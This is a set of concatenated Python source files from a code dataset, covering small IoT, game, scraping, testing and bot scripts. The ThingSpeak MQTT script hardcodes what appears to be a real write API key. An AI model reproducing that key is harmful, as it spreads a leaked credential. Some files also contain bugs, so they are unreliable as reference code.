calculate display for bars\nbars = []\n\nfor i in range(0,10):\n bars.append(0)\n\nfor mark in marks:\n bars[mark//10] += 1\n\n### generate html\ntags = \"

Welcome to statistics page!

\"\n\nhtml = \"
Average is: \" + str(average) + \\\n \"
Minimum is: \" + str(minimum) + \\\n \"
Maximum is: \" + str(maximum) +\"


\"\n\nchart = \" \"\nline2 = \"\"\n\ni=0\nfor b in bars:\n height = 20 * b\n chart += \"\"\n line2 += \"\"\n i += 10\n\nchart += \"\"\nendtags = \"
[\" + str(i) + \"-\" + str(i+9) + \"]
\"\n\nout = open(\"lab8q2_outputv1.html\", 'w')\nout.write(tags + html + chart + line2 + endtags)\nout.close()\n","sub_path":"175 _labs/lab8_q2_v1.py","file_name":"lab8_q2_v1.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"613704719","text":"\"\"\"This script sends a data value to the thingspeak mqtt broker\"\"\"\n\nimport paho.mqtt.client as mqtt\nimport random as rnd\n\nclient = mqtt.Client()\nclient.connect(\"mqtt.thingspeak.com\", 1883, 60)\n\nchannelId = \"796449\" # Put your channel ID here,i.e.. the number from the URL, https://thingspeak.com/channels/285697\napiKey = \"CE3VZQG9NVE186VO\" # Put the API key here (the Write API Key from the API Keys tab in ThingSpeak)\n\n\n\nclient.publish(f\"channels/{channelId}/publish/{apiKey}\" , \"field1=102\", 0)\nclient.loop(2)\n","sub_path":"mqtt-local-client/r.py","file_name":"r.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"418768340","text":"from pubnub import Pubnub\r\nimport httplib, time,json,urllib,constants,grovepi, urllib2\r\nfrom grovepi import *\r\n\r\nclass SmartGarden:\r\n def update(self, sessionToken, username):\r\n self.username = username\r\n self.sessionToken = sessionToken\r\n self.temperature = 0\r\n self.humidity = 0\r\n self.moisture = 0\r\n self.light = 0\r\n self.waterNow = False\r\n grovepi.pinMode(constants.LIGHT_PIN,\"INPUT\")\r\n grovepi.pinMode(constants.MOISTURE_PIN,\"INPUT\")\r\n grovepi.pinMode(constants.TEMP_HUMIDITY_PIN,\"INPUT\")\r\n grovepi.pinMode(constants.PUMP_RELAY_PIN,\"OUTPUT\")\r\n self.pubnub = Pubnub(publish_key=constants.PUBNUB_PUBLISH_KEY, subscribe_key=constants.PUBNUB_SUBSCRIBE_KEY, ssl_on = True)\r\n self.sendSensors = False\r\n while True: #keep trying until you have internet\r\n try:\r\n req = urllib2.Request(constants.ROOT_URL + 'active-plant')\r\n 
req.add_header('x-access-token', sessionToken)\r\n result = json.loads(urllib2.urlopen(req).read())\r\n\r\n self.waterAmount = result[\"waterAmount\"]\r\n self.harvest = len(result[\"harvests\"])\r\n self.moistureLimit = result[\"moistureLimit\"] \r\n break\r\n except Exception as e:\r\n s = str(e)\r\n \r\n def __init__(self, sessionToken, username):\r\n self.update(sessionToken, username)\r\n\r\n def ioLoop(self):\r\n while True: \r\n time.sleep(.2)\r\n if self.sendSensors:\r\n while self.waterNow:\r\n time.sleep(.1) \r\n self.readSensors() \r\n data = {\r\n \"humidity\":self.humidity,\r\n \"light\":self.light,\r\n \"moisture\":self.moisture,\r\n \"temperature\":self.temperature \r\n }\r\n self.pubnub.publish(self.username + constants.WEBSITE_CHANNEL, data)\r\n\r\n def sendDataDb(self, water = False):\r\n if self.sendSensors:\r\n time.sleep(.3) #wait long enough for it to read, it should have already read a bunch but this is just to make sure\r\n else:\r\n self.readSensors()\r\n data = {\r\n \"humidity\":self.humidity,\r\n \"light\":self.light,\r\n \"moisture\":self.moisture,\r\n \"temperature\":self.temperature,\r\n \"harvest\":self.harvest,\r\n \"water\": self.waterAmount if water else 0,\r\n }\r\n while True:\r\n try:\r\n req = urllib2.Request(constants.ROOT_URL + 'sensor-data')\r\n req.add_header('Content-Type', 'application/json')\r\n req.add_header('x-access-token', self.sessionToken)\r\n response = urllib2.urlopen(req, json.dumps(data)).read()\r\n break\r\n except Exception as e:\r\n s = str(e) \r\n\r\n def sendDataDbAndCheckWater(self):\r\n while True:\r\n time.sleep(900) #every 15 minutes\r\n if self.sendSensors:\r\n time.sleep(.3) #wait long enough for it to read\r\n else:\r\n self.readSensors()\r\n if self.moisture < self.moistureLimit:\r\n self.waterPlants()\r\n else:\r\n self.sendDataDb()\r\n\r\n def waterPlants(self): \r\n self.waterNow = True\r\n grovepi.digitalWrite(constants.PUMP_RELAY_PIN,1)\r\n time.sleep(self.waterAmount / 
constants.FLOW_RATE)\r\n grovepi.digitalWrite(constants.PUMP_RELAY_PIN,0)\r\n grovepi.digitalWrite(constants.PUMP_RELAY_PIN,0)\r\n grovepi.digitalWrite(constants.PUMP_RELAY_PIN,0)\r\n self.waterNow = False\r\n self.sendDataDb(True) \r\n\r\n def readSensors(self):\r\n try:\r\n while True:\r\n [ temperature, humidity ] = dht(constants.TEMP_HUMIDITY_PIN,0)\r\n moisture = grovepi.analogRead(constants.MOISTURE_PIN)\r\n light = grovepi.analogRead(constants.LIGHT_PIN)\r\n if temperature < 200 and temperature >= 0 and humidity >=0 and humidity <= 100 and moisture >= 0 and moisture <= 700 and light >= 0 and light <= 700:\r\n self.temperature = temperature\r\n self.humidity = humidity\r\n self.moisture = moisture\r\n self.light = light\r\n break\r\n except Exception as e:\r\n self.readSensors() #keep trying until it works\r\n","sub_path":"SmartGarden.py","file_name":"SmartGarden.py","file_ext":"py","file_size_in_byte":4638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"200213146","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\n\n\nActivePlayer = 1\nP1=[]\nP2=[]\n\n\n#-------------------------------------------------------------------\n\nroot=Tk()\nroot.title('Tic Tac Toy : Player 
1')\nroot.maxsize(300,300)\nstyle=ttk.Style()\nstyle.theme_use('classic')\n\n\n#-------------------------------------------------------------\n\nbou1=ttk.Button(root,text='')\nbou1.grid(row=0,column=0,ipadx=30,ipady=30,sticky='snew')\nbou1.config(command=lambda:buclick(1))\n\n\nbou2=ttk.Button(root,text='')\nbou2.grid(row=0,column=1,ipadx=30,ipady=30,sticky='snew')\nbou2.config(command=lambda:buclick(2))\n\n\nbou3=ttk.Button(root,text='')\nbou3.grid(row=0,column=2,ipadx=30,ipady=30,sticky='snew')\nbou3.config(command=lambda:buclick(3))\n\n\nbou4=ttk.Button(root,text='')\nbou4.grid(row=1,column=0,ipadx=30,ipady=30,sticky='snew')\nbou4.config(command=lambda:buclick(4))\n\n\nbou5=ttk.Button(root,text='')\nbou5.grid(row=1,column=1,ipadx=30,ipady=30,sticky='snew')\nbou5.config(command=lambda:buclick(5))\n\n\nbou6=ttk.Button(root,text='')\nbou6.grid(row=1,column=2,ipadx=30,ipady=30,sticky='snew')\nbou6.config(command=lambda:buclick(6))\n\n\nbou7=ttk.Button(root,text='')\nbou7.grid(row=2,column=0,ipadx=30,ipady=30,sticky='snew')\nbou7.config(command=lambda:buclick(7))\n\n\nbou8=ttk.Button(root,text='')\nbou8.grid(row=2,column=1,ipadx=30,ipady=30,sticky='snew')\nbou8.config(command=lambda:buclick(8))\n\n\nbou9=ttk.Button(root,text='')\nbou9.grid(row=2,column=2,ipadx=30,ipady=30,sticky='snew')\nbou9.config(command=lambda:buclick(9))\n\n\n#--------------------------------------------------------------\n\ndef buclick(id):\n\tglobal ActivePlayer\n\tglobal P1\n\tglobal P2\n\n\tif(ActivePlayer ==1):\n\t\tsetlayout(id,'X')\n\t\tP1.append(id)\n\t\troot.title('Tic Tac Toy : Player 2')\n\t\tActivePlayer =2\n\n\n\telif(ActivePlayer ==2):\n\t\tsetlayout(id,'O')\n\t\tP2.append(id)\n\t\troot.title('Tic Tac Toy : Player 1')\n\t\tActivePlayer =1\n\n\tif len(P1) or len(P2)>2:\n\t\tCheckWiner()\n#--------------------------------------------------------\n\ndef setlayout(id,text):\n if(id==1):\n \tbou1.config(text=text)\n \tbou1.state(['disabled'])\n\n elif(id==2):\n 
\tbou2.config(text=text)\n \tbou2.state(['disabled'])\n\n elif(id==3):\n \tbou3.config(text=text)\n \tbou3.state(['disabled'])\n\n elif(id==4):\n \tbou4.config(text=text)\n \tbou4.state(['disabled'])\n\n elif(id==5):\n \tbou5.config(text=text)\n \tbou5.state(['disabled'])\n\n elif(id==6):\n \tbou6.config(text=text)\n \tbou6.state(['disabled'])\n\n elif(id==7):\n \tbou7.config(text=text)\n \tbou7.state(['disabled'])\n\n elif(id==8):\n \tbou8.config(text=text)\n \tbou8.state(['disabled'])\n \n elif(id==9):\n \tbou9.config(text=text)\n \tbou9.state(['disabled'])\n\n\n\n#---------------------------------------------------------------------\n\ndef CheckWiner():\n\twiner= -1\n\n\tif((1 in P1) and(2 in P1) and(3 in P1)):\n\t\twiner =1\n\tif((1 in P2) and(2 in P2) and(3 in P2)):\n\t\twiner =2\n\n\n\n\tif((4 in P1) and(5 in P1) and(6 in P1)):\n\t\twiner =1\n\tif((4 in P2) and(5 in P2) and(6 in P2)):\n\t\twiner =2\n\n\n\tif((7 in P1) and(8 in P1) and(9 in P1)):\n\t\twiner =1\n\tif((7 in P2) and(8 in P2) and(9 in P2)):\n\t\twiner =2\n\n\n\n\tif((1 in P1) and(4 in P1) and(7 in P1)):\n\t\twiner =1\n\tif((1 in P2) and(4 in P2) and(7 in P2)):\n\t\twiner =2\n\n\n\tif((2 in P1) and(5 in P1) and(8 in P1)):\n\t\twiner =1\n\tif((2 in P2) and(5 in P2) and(8 in P2)):\n\t\twiner =2\n\n\n\tif((3 in P1) and(6 in P1) and(9 in P1)):\n\t\twiner =1\n\tif((3 in P2) and(6 in P2) and(9 in P2)):\n\t\twiner =2\n\n\n\n\tif((1 in P1) and(5 in P1) and(9 in P1)):\n\t\twiner =1\n\tif((1 in P2) and(5 in P2) and(9 in P2)):\n\t\twiner =2\n\n\n\tif((3 in P1) and(5 in P1) and(7 in P1)):\n\t\twiner =1\n\tif((3 in P2) and(5 in P2) and(7 in P2)):\n\t\twiner =2\n\n\t\n\tif winer ==1:\n\t\tmessagebox.showinfo(title='Cong',message='Player 1 is winer')\n\n\tif winer ==2:\n\t\tmessagebox.showinfo(title='Cong',message='Player 2 is winer')\n\t\n \n\t\n \n\n\t\t\n\nroot.mainloop()\n","sub_path":"tic tac toy .py","file_name":"tic tac toy 
.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"490540990","text":"'''\nCreated on 16.02.2010\n \n@author: Dmytro Korsakov\n'''\n \nimport unittest\nimport os\nfrom scalarizr.bus import bus\nfrom scalarizr.handlers import apache\nfrom szr_unittest import RESOURCE_PATH\nfrom scalarizr.config import ScalarizrCnf\n \nfrom szr_unittest_libs.mock import QueryEnvService\nfrom scalarizr.queryenv import VirtualHost\n \n \nclass Test(unittest.TestCase):\n \n def setUp(self):\n bus.etc_path = os.path.join(RESOURCE_PATH, 'etc')\n cnf = ScalarizrCnf(bus.etc_path)\n cnf.load_ini('app')\n bus.cnf = cnf\n self._cnf = bus.cnf\n \n bus.base_path = os.path.realpath(RESOURCE_PATH + \"/../../..\")\n bus.share_path = os.path.join(bus.base_path, 'share')\n \n bus.queryenv_service = qe\n bus.define_events(\"before_host_down\", \"init\")\n \n '''\n config = bus.config\n self.vhosts_path = config.get('behaviour_app','vhosts_path')\n self.httpd_conf_path = config.get('behaviour_app','httpd_conf_path')\n '''\n \n def _test_cleanup(self):\n old_vhost = self.vhosts_path + \"/test.vhost\"\n if not os.path.exists(self.vhosts_path):\n os.makedirs(self.vhosts_path)\n open(old_vhost,'w').close\n self.assertTrue(os.path.exists(old_vhost))\n \n test_vhost = self.vhosts_path + \"/test-example.scalr.net-ssl.vhost.conf\"\n if os.path.exists(test_vhost):\n os.remove(test_vhost)\n self.assertFalse(os.path.exists(test_vhost))\n \n bus.queryenv_service = qe\n a = apache.ApacheHandler()\n a.on_VhostReconfigure(\"\")\n \n self.assertFalse(os.path.exists(old_vhost))\n self.assertTrue(os.path.exists(test_vhost))\n self.assertEqual(os.listdir(self.vhosts_path),['test-example.scalr.net-ssl.vhost.conf'])\n \n httpd_conf_file = open(self.httpd_conf_path, 'r')\n text = httpd_conf_file.read()\n index = text.find('Include ' + self.vhosts_path + '/*')\n self.assertNotEqual(index, -1)\n \nvhost = VirtualHost(\n 
hostname = \"test-example.scalr.net\",\n type = \"apache\",\n raw= \"\"\"\nDocumentRoot /var/www/1/\nServerName test-example.scalr.net\nCustomLog /var/log/apache2/test-example.scalr.net-access.log1 combined\n# CustomLog /var/log/apache2/test-example.scalr.net-access.log2 combined\nErrorLog /var/log/apache2/test-example.scalr.net-error.log3\n#ErrorLog /var/log/apache2/test-example.scalr.net-error.log4#\n# ErrorLog /var/log/apache2/test-example.scalr.net-error.log_5#\n# ErrorLog /var/log/apache2/test-example.scalr.net-error.log_6_#\n# Other directives here\n \n \"\"\",\n https = True)\n \nqe = QueryEnvService(\n list_virtual_hosts = list(vhost,),\n get_https_certificate = (\"MIICWjCCAhigAwIBAgIESPX5.....1myoZSPFYXZ3AA9kwc4uOwhN\",\"MIICWjCCAhigAwIBAgIESPX5.....1myoZSPFYXZ3AA9kwc4uOwhN\")\n)\n \nbus.queryenv_service = qe\n \n \nif __name__ == \"__main__\":\n unittest.main()\n \n","sub_path":"tests/unit/scalarizrtests/handlers/test_apache.py","file_name":"test_apache.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"311186015","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport logging\nimport wikipedia\n\n\n\"\"\"Scrapes Data about subject from various datasources\n\nArguments:\n subject (string): subject to search about\n data_sources (array): Array of strings of datasources\n\nExample Use:\n dataScrapper = DataScrapper(subject, [\"wikipedia\"])\n dataScrapper.collect_all_data()\n text, categories = dataScrapper.merge_and_get_all_collected_data()\n\nCustom DataSet:\n If you want to add custom data to include when creating a knowledge model\n place this in \n \n -> data/custom_data_source\n\n The name should be the same as the question or audience subject\n and the format needs to obey the following structure\n {\n \"content\": ,\n \"categories\": [\"array\", \"of\", \"stuff\"]\n }\n\n\"\"\"\nclass DataScrapper:\n \n def __init__(self, 
subject=None, data_sources=[\"wikipedia\"]):\n\n if (subject == None or data_sources == []):\n logging.error(\"Please provide subject to DataScrapper\")\n\n self.data_sources = data_sources\n self.subject = subject\n self.data = {}\n\n def merge_and_get_all_collected_data(self):\n if (self.data == {}):\n logging.info(\"No data scrapped yet for subject {}.\".format(self.subject))\n\n text = \"\"\n categories = []\n\n # Loop over data sources collected and add to content\n for key, value in self.data.items():\n if (self.data[key][\"content\"]):\n text += self.data[key][\"content\"]\n\n if (self.data[key][\"categories\"]):\n categories = categories + self.data[key][\"categories\"]\n\n return text, categories\n\n\n def collect_all_data(self):\n\n # Loop over datasources to collect data\n for data_source in self.data_sources:\n \n if (data_source == \"wikipedia\"):\n logging.debug(\"Collecting data for {} from wikipedia\".format(self.subject))\n self._build_profile_from_wikipedia()\n\n elif (data_source == \"britannica\"):\n logging.debug(\"Collecting data for {}from britannica - NOTE: NOT IMPLEMENTED\".format(self.subject))\n self._build_profile_from_britannica()\n\n elif (data_source == \"biography\"):\n logging.debug(\"Collecting data for {}from biography - NOTE: NOT IMPLEMENTED\".format(self.subject))\n self._build_profile_from_biography()\n\n elif (data_source == \"custom\"):\n logging.debug(\"Collecting data for {}from biography - NOTE: NOT IMPLEMENTED\".format(self.subject))\n self._build_profile_from_custom()\n\n else:\n logging.info(\"\")\n\n # --- Internal Methods ---\n\n def _build_profile_from_wikipedia(self):\n wiki_data_set = {}\n wiki_suggestions = wikipedia.search(self.subject)\n\n # try except in case the first entity doesnt lead to a valid search\n try:\n wiki_entity = wiki_suggestions[0]\n logging.debug(\"Scrapping for \" + wiki_entity)\n\n wiki_categories = wikipedia.page(wiki_entity).categories\n wiki_content = 
wikipedia.page(wiki_entity).content\n\n wiki_data_set = {\n \"suggestions\" : wiki_suggestions,\n \"categories\" : wiki_categories,\n \"content\" : wiki_content\n }\n except:\n wiki_entity = wiki_suggestions[1]\n\n wiki_categories = wikipedia.page(wiki_entity).categories\n wiki_content = wikipedia.page(entity).content\n\n wiki_data_set = {\n \"suggestions\" : wiki_suggestions,\n \"categories\" : wiki_categories,\n \"content\" : wiki_content\n }\n\n print(wiki_data_set)\n\n self.data[\"wikipedia\"] = wiki_data_set\n\n def _build_profile_from_britannica(self):\n logging.debug(\"Still need to implement this method\")\n\n def _build_profile_from_biography(self):\n logging.debug(\"Still need to implement this method\")\n\n def _build_profile_from_custom(self):\n data = None\n my_file = Path(\"data/custom_data_source/\" + self.subject.replace(\" \", \"_\") + \".json\")\n\n if my_file.is_file():\n with open(\"data/custom_data_source/\" + self.subject.replace(\" \", \"_\") + \".json\") as file:\n data = json.load(file)\n\n if (data == None):\n logging.error(\"Knowledge base does not exist in file system\")\n\n return {\n \"categories\" : data.categories,\n \"content\" : data.content\n }","sub_path":"classes/DataScrapper.py","file_name":"DataScrapper.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"98129985","text":"#!/usr/bin/env python3\n\n'电影评论词云图'\n\nimport logging\nimport pandas as pd\nimport jieba\nimport pickle\nfrom os import path\nimport matplotlib.pyplot as plt\n# https://www.lfd.uci.edu/~gohlke/pythonlibs/ wordcloud下载\nfrom wordcloud import WordCloud,STOPWORDS,ImageColorGenerator\n\n\nlogging.basicConfig(level=logging.ERROR)\n\ndf=pd.read_csv('hidden_man_norepeat.csv',encoding='gb18030')\n\ncomment=df['评论'].tolist()\n# 查看里面字符串换行的编码:发现是/r/r/n\nlogging.info(comment[1].encode('gbk'))\n\n# 替换掉换行\ncomment=list(map(lambda x:x.replace('\\r\\r\\n',''),comment))\n\n# 
截词\ncomment_cut=jieba.cut(str(comment),cut_all=False)\n\n# for i in range(6):\n# logging.info(next(comment_cut))\n# INFO:root:[\n# INFO:root:'\n# Building prefix dict from the default dictionary ...\n# DEBUG:jieba:Building prefix dict from the default dictionary ...\n# Loading model from cache C:\\Users\\Peter\\AppData\\Local\\Temp\\jieba.cache\n# DEBUG:jieba:Loading model from cache C:\\Users\\Peter\\AppData\\Local\\Temp\\jieba.cache\n# Loading model cost 1.404 seconds.\n# DEBUG:jieba:Loading model cost 1.404 seconds.\n# Prefix dict has been built succesfully.\n# DEBUG:jieba:Prefix dict has been built succesfully.\n# INFO:root:完全\n# INFO:root:不\n# INFO:root:知道\n# INFO:root:演\n\n# 将词连接成字符串\nword_space_split=\" \".join(comment_cut)\n\n# 导入背景图\nbackground_image=plt.imread('./WeChat Image_20180727141117.jpg')\nstopwords=STOPWORDS.copy()\n# 可以加多个屏蔽词\nfor i in [\"电影\",\"姜文\",\"彭于\",\"真的\",\"有点\",\"廖凡\",\"演技\",\"演员\",\"超级\",\"但是\",\"就是\",\"剧情\",\"一个\",\"一部\",\"看到\",\"还是\",\"不是\",\"什么\",\"感觉\",\"这部\",\"子弹\",\"片子\"]:\n stopwords.add(i)\n# 设置词云参数 \n# 参数分别是指定字体、背景颜色、最大的词的大小、使用给定图作为背景形状\nwc = WordCloud(width=1024,height=768,background_color='white',mask=background_image,font_path = 'simhei.ttf',stopwords=stopwords,max_font_size=400,random_state=50)\n# wc.generate_from_text(\"中国 中国 北京 珠海 珠海 珠海 深圳\")\nwc.generate_from_text(word_space_split)\n\n# 从背景图中取色\nimg_colors= ImageColorGenerator(background_image)\nwc.recolor(color_func=img_colors)\n\n# 保存结果到本地\nwc.to_file('hm.jpg')\n\nplt.imshow(wc)\nplt.axis('off') # 不显示坐标轴 \nplt.show()\n\n","sub_path":"python-sample/scraping/maoyan/hm_wordcloud.py","file_name":"hm_wordcloud.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"256677413","text":"from ircbot import Irc\nimport time \nimport threading\nimport Queue\n\nexitFlag = 0\n\nclass Control(threading.Thread):\n\n\tdef __init__(self, threadID, name, config, queue, 
func):\n\t\tthreading.Thread.__init__(self)\n\t\tself.threadID = threadID\n\t\tself.name = name\n\t\tself.config = config\n\t\tself.queue = queue\n\t\tself.func = func\n\t\n\tdef run(self):\n\t\tself.func()\n","sub_path":"lib/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"118748670","text":"# -*- coding: utf-8 -*-\n\nimport re,urlparse\n\nfrom module.plugins.internal.SimpleCrypter import SimpleCrypter\nfrom module.plugins.internal.SimpleHoster import parse_fileInfo\n\nclass EbookhellTo(SimpleCrypter):\n __name__ = \"EbookhellTo\"\n __type__ = \"crypter\"\n __version__ = \"0.01\"\n __pattern__ = r'https?://(www\\.)?ebook-hell.to/.+'\n __description__ = \"\"\"ebook-hell.to decrypter plugin\"\"\"\n __config__ = [(\"hostersInParallel\", \"1;2;3;all\", \"How many to use in parallel\", \"all\"),\n (\"readPackageName\", \"bool\", \"Search package/folder name on the website\", \"True\")]\n __authors__ = [(\"zapp-brannigan\", \"\")]\n\n NAME_PATTERN = r'TITLE=\"Cover:\\s*(?P.+?)[\\n\"]'\n LINK_PATTERN = r'HREF=\"(?P.+?)\" TARGET=\"_blank\">= 97 and self.letterList[i] <= 122:\r\n self.letterList[i] = chr(self.letterList[i]-32)\r\n runErrorCheck = False\r\n elif self.letterList[i] >= 48 and self.letterList[i] <= 57:\r\n self.letterList[i] = chr(self.letterList[i])\r\n runErrorCheck = False\r\n elif self.letterList[i] == 8:\r\n self.letterList = self.letterList[:-2]\r\n runErrorCheck = False\r\n else:\r\n self.letterList = self.letterList[:-1]\r\n except:\r\n pass\r\n if len(self.letterList) >= 7:\r\n self.letterList = self.letterList[:-1]\r\n self.string = ''.join(self.letterList)\r\n generateText(self.string, self.textRect[0], self.textRect[1], (0, 0, 0), self.fontSize)\r\n def update(self):\r\n if self.backgroundRect.collidepoint(mousePosition):\r\n if mousePress[0] == True:\r\n self.displayBox = True\r\n if not 
self.backgroundRect.collidepoint(mousePosition):\r\n if mousePress[0] == True:\r\n self.displayBox = False\r\n if self.displayBox == True:\r\n self.displayInputBox()\r\n self.inputAccepted = True\r\n if self.displayBox == False:\r\n if not len(self.letterList) > 0:\r\n self.displayInputText()\r\n else:\r\n self.getLetters = False\r\n self.displayInputBox()\r\n self.printLetters()\r\n self.inputAccepted = False\r\n if self.inputAccepted == True:\r\n self.getLetters = True\r\n self.printLetters()\r\n\r\ndef generateText(text, xpos, ypos, color, fontSize):\r\n font = pygame.font.Font(None, fontSize)\r\n text = font.render(text, 1, color)\r\n textpos = text.get_rect()\r\n if type(xpos) == str:\r\n if xpos == 'center':\r\n textpos.x = (width/2)-textpos.width/2\r\n if xpos == 'left':\r\n textpos.x = 40\r\n if xpos == 'right':\r\n textpos.x = 480-textpos.width-10\r\n elif type(xpos) == int:\r\n textpos.x = xpos\r\n if type(ypos)== str:\r\n if ypos == 'center':\r\n textpos.y = 720/2-textpos.height\r\n elif type(ypos) == int:\r\n textpos.y = ypos\r\n screen.blit(text, textpos)\r\n\r\ndef check():\r\n global runErrorCheck, acceptedWord, realWord\r\n runErrorCheck = False\r\n acceptedWord = False\r\n runErrorCheck = True\r\n realWord = False\r\n check = carPlateRegistrationSystem.check()\r\n if check.word(inputBox.string.lower()) == True:\r\n realWord = True\r\n if check.wordLength(inputBox.string) == False:\r\n generateText('Word length must be equal to six characters.', 'center', 80, (255, 0, 0), 16)\r\n elif check.registered(inputBox.string) == True:\r\n generateText('Name already registered.', 'center', 80, (255, 0, 0), 16)\r\n elif check.restricted(inputBox.string.lower()) == True:\r\n generateText('Restricted name.', 'center', 80, (255, 0, 0), 16)\r\n elif accepted == True:\r\n generateText('Registered!', 'center', 80, (0,0,0), 16)\r\n else:\r\n generateText('Accepted!', 'center', 80, (0, 200, 0), 16)\r\n return True\r\n \r\ndef register():\r\n global runErrorCheck, 
totalPrice\r\n accepted = True\r\n carPlateRegistrationSystem.writeFile(inputBox.string)\r\n runErrorCheck = False\r\n if realWord == True:\r\n totalPrice += 110\r\n else:\r\n totalPrice += 70\r\n print('$' + str(totalPrice))\r\n \r\ndef update():\r\n global mousePosition, mousePress, keys, accepted\r\n keys = pygame.key.get_pressed()\r\n mousePosition = pygame.mouse.get_pos()\r\n mousePress = pygame.mouse.get_pressed()\r\n screen.fill((255, 255, 255))\r\n objects.update()\r\n if runErrorCheck == True:\r\n if check() == True:\r\n registerButton.update()\r\n pygame.display.update()\r\n\r\ndef price():\r\n pass\r\nrunErrorCheck = False\r\nacceptedWord = False\r\naccepted = False\r\n\r\ntotalPrice = 0\r\n\r\nquitButton = button('Quit', 'center', 170, (0, 0, 0), (200, 200, 200), (0,0,0), 16, 'pygame.quit()', 'sys.exit()')\r\ncheckButton = button('Check availabilty', 220, 50, (0,0,0), (200,200,200), (0,0,0), 16, 'check()')\r\nregisterButton = button('Register plate', 'center', 107, (0,0,0), (200,200,200), (0,0,0), 16, 'register()')\r\ninputBox = inputText(100, 50, 100, 'Type here...', (100,100,100), (200, 200, 200), (0, 0, 0), 16)\r\nobjects = pygame.sprite.Group()\r\nobjects.add(quitButton)\r\nobjects.add(checkButton)\r\nobjects.add(inputBox)\r\n\r\n\r\nwhile True:\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n if inputBox.getLetters == True:\r\n if event.type == pygame.KEYDOWN:\r\n inputBox.letterList.append(event.key)\r\n \r\n update()\r\n\r\n","sub_path":"Code/Pygame Based/20140403/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":9096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"548025770","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pywikibot, re, sys, argparse\n\nimport blib\nfrom blib import getparam, rmparam, tname, pname, msg, errandmsg, site\n\ndef process_page(page, index, line, respelling, 
orig_template, repl_template,\n args):\n pagetitle = str(page.title())\n def pagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n\n if respelling == \"-\":\n pagemsg(\"Skipping line with respelling '-': %s\" % line)\n return\n\n if respelling == \"\":\n pagemsg(\"WARNING: Skipping blank respelling: %s\" % line)\n return\n\n notes = []\n\n text = str(page.text)\n if orig_template not in text:\n pagemsg(\"WARNING: Can't find original template %s in text\" % orig_template)\n return\n\n m = re.search(\"^.*?%s.*$\" % re.escape(orig_template), text, re.M)\n if not m:\n pagemsg(\"WARNING: Couldn't find template %s in page text\" % orig_template)\n textline = \"(unknown)\"\n else:\n textline = m.group(0)\n\n m = re.search(r\"(\\|pos=[a-z]+)\", repl_template)\n if m:\n posarg = m.group(1)\n else:\n posarg = \"\"\n if respelling == \"y\":\n respellingarg = \"\"\n else:\n respellingarg = \"|\" + \"|\".join(respelling.split(\",\"))\n real_repl = \"{{fr-IPA%s%s}}\" % (respellingarg, posarg)\n\n if \"{{a|\" in textline:\n pagemsg(\"WARNING: Replacing %s with %s and saw accent spec on line: %s\" % (\n orig_template, real_repl, textline))\n\n newtext, did_replace = blib.replace_in_text(text, orig_template,\n real_repl, pagemsg)\n text = newtext\n if did_replace:\n notes.append(\"semi-manually replace %s with %s\" % (orig_template, real_repl))\n if respelling != \"y\":\n parsed = blib.parse_text(text)\n saw_fr_conj_auto = False\n for t in parsed.filter_templates():\n tn = tname(t)\n if tn == \"fr-conj-auto\":\n if saw_fr_conj_auto:\n pagemsg(\"WARNING: Saw {{fr-conj-auto}} twice, first=%s, second=%s\" % (\n saw_fr_conj_auto, str(t)))\n saw_fr_conj_auto = str(t)\n if getparam(t, \"pron\"):\n pagemsg(\"WARNING: Already saw pron= param: %s\" % str(t))\n continue\n pronarg = \",\".join(pron or pagetitle for pron in respelling.split(\",\"))\n origt = str(t)\n t.add(\"pron\", pronarg)\n pagemsg(\"Replaced %s with %s\" % (origt, str(t)))\n notes.append(\"add pron=%s to 
{{fr-conj-auto}}\" % pronarg)\n text = str(parsed)\n\n return text, notes\n\nparser = blib.create_argparser(\"Push manual {{fr-IPA}} replacements for {{IPA|fr}}\")\nparser.add_argument(\"--direcfile\", help=\"File of directives\", required=True)\nargs = parser.parse_args()\nstart, end = blib.parse_start_end(args.start, args.end)\n\nfor index, line in blib.iter_items_from_file(args.direcfile, start, end):\n m = re.search(r\"^(.*?)\\|Page [0-9]+ (.*?): WARNING: Can't replace (\\{\\{IPA\\|fr\\|.*?\\}\\}) with (\\{\\{.*?\\}\\}) because auto-generated pron .*$\", line)\n if not m:\n errandmsg(\"Line %s: Unrecognized line: %s\" % (index, line))\n continue\n respelling, page, orig_template, repl_template = m.groups()\n def do_process_page(page, index, parsed):\n return process_page(page, index, line, respelling, orig_template,\n repl_template, args)\n blib.do_edit(pywikibot.Page(site, page), index, do_process_page,\n save=args.save, verbose=args.verbose, diff=args.diff)\n","sub_path":"push_manual_fr_pronun_fixes.py","file_name":"push_manual_fr_pronun_fixes.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"405532698","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n\"\"\"\n@author: 桂引暄\n\npart4: 统计\n\"\"\"\nimport pandas as pd\nimport BasicInfo as bs\nfrom TreeBuild import *\n\nglobal Elist\nElist=[\"小学\", 